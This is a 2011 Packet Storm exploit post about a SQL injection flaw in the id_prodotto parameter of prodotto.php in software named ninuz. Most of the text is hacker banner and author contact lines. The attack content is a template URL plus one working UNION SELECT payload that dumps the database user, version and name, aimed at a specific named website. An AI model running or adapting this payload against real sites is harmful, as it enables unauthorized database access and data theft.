Ninuz SQL Injection

2011-08-25T00:00:00
ID PACKETSTORM:104456
Type packetstorm
Reporter Ehsan_Hp200
Modified 2011-08-25T00:00:00

Description

                                        
                                            `  
################################ IRANIAN THE BEST HACKERS IN THE WORLD ##################  
#################### ####################  
##  
## Remote SQL injection Vulnerability  
##  
## ninuz (prodotto.php?id_prodotto)  
##   
###############################################################  
###############################################################  
###############################################################  
###############################################################  
##  
## AuTh0r : Ehsan_Hp200  
##  
## H0ME : www.ehsanhp.blogsky.com  
##  
## Email : Ehsan_Hp200@Hotmail.com  
##   
## Vendor : http://www.ninuz.com/  
##   
## Persian Gulf 4 Ever!  
#############################  
#############################  
#############################  
#############################  
#############################  
##  
##  
  
Exploite:  
  
www.victim.com/prodotto.php?id_prodotto=[SQL]  
  
Example :  
  
http://www.schedled.com/prodotto.php?id_prodotto=-6+Union+Select+1,2,user(),version(),database(),6--  
  
#########################################################################################  
SpeCial TanX To : Skote_Vahshat  
##########################################################################################  
############################### IRANIAN THE BEST HACKERS IN THE WORLD ##################   
  
`